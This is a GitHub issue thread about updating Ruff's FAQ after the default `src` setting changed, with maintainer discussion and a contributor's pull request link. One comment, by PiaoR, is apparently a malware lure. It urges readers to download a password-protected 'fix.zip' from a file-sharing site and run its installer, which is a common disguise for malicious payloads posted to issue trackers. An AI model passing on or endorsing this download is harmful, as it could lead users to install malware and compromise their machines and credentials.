### ISSUE TITLE
Update FAQ to reflect the default value of `src`

### ISSUE THREAD

**Issue by dhruvmanila** [astral-sh/ruff#13134]
Update to FAQ.md at https://github.com/astral-sh/ruff/blob/main/docs/faq.md is merited as a result of this change I think.

Specifically, the following bullet can be removed:
> Depending on your project structure, Ruff and isort can differ in their detection of first-party code. (This is often solved by modifying the src property, e.g., to src = ["src"], if your code is nested in a src directory.)

_Originally posted by @NasaGeek in https://github.com/astral-sh/ruff/issues/12848#issuecomment-2310740279_

**Comment by dhruvmanila** [comment]
I think we should instead highlight the fact that this was changed in 0.6 instead of removing the bullet point.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by PalAditya** [comment]
Hi @dhruvmanila - I love Ruff and wanted to contribute to it for some time, so just made a PR for this: https://github.com/astral-sh/ruff/pull/13145 . I didn't see anything in the contributing guidelines about prior assignment, but please let me know if it needs changes/I should have completed some pre-requisite first if you get a chance to review this.
